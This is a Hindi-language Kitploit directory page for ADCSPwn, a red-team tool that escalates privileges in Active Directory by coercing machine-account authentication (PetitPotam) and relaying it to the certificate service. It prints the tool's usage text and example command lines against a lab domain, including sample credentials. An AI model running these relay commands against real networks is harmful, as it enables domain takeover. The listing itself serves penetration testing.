Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ADCSPwn — एक्टिव डायरेक्टरी नेटवर्क में मशीन अकाउंट्स से प्रमाणीकरण मजबूर करके और प्रमाणपत्र सेवा पर रिले करके विशेषाधिकार बढ़ाने का एक उपकरण। | Kitploit
उपकरण/GitHubGitHub/bats3c/adcspwn
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubbats3c/adcspwn

ADCSPwn

एक्टिव डायरेक्टरी नेटवर्क में मशीन अकाउंट्स से प्रमाणीकरण मजबूर करके और प्रमाणपत्र सेवा पर रिले करके विशेषाधिकार बढ़ाने का एक उपकरण।

रिपॉजिटरी देखें
8781275 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ADCSPwn

एक्टिव डायरेक्टरी नेटवर्क में मशीन खातों से प्रमाणीकरण को बाध्य करके (Petitpotam) और प्रमाणपत्र सेवा पर रिले करके विशेषाधिकार बढ़ाने का एक उपकरण।

उपयोग

अपने लक्ष्य नेटवर्क पर ADCSPwn चलाएं।

root@kitploit:~
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec
Contributor: @424f424f -  Black Hills Information Security

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

Required arguments:
adcs            -       This is the address of the AD CS server which authentication will be relayed to.

Optional arguments:
secure          -       Use HTTPS with the certificate service.
port            -       The port ADCSPwn will listen on.
remote          -       Remote machine to trigger authentication from.
username        -       Username for non-domain context.
password        -       Password for non-domain context.
dc              -       Domain controller to query for Certificate Templates (LDAP).
unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output          -       Output path to store base64 generated crt.

Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share

श्रेय

  • @harmj0y और @tifkin_ इस मुद्दे का विवरण देने वाले उनके श्वेतपत्र के लिए।
  • @topotam77 यह दिखाने के लिए कि EfsRpcOpenFileRaw का दुरुपयोग कैसे किया जा सकता है।
टूल डाउनलोड करें